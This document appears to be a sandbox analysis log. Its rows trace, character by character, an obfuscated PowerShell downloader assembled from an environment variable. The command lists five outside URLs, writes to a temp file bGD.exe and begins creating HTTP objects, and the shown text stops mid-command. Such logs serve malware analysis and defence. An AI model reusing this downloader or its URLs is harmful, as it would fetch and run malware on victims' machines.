| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\b |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bG |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.e |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.ex |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe') |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe'); |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$r |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$ra |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat = |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =N |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =Ne |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New- |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-O |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Ob |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Obj |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Obje |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Objec |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object - |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -c |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -co |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com ' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'm |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'ms |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msx |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxm |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2 |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.x |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xm |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xml |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlh |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlht |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhtt |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp'; |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$E |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EH |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = N |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = Ne |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New- |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-O |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Ob |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Obj |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Obje |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Objec |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object - |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -c |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -co |
|
1 | |
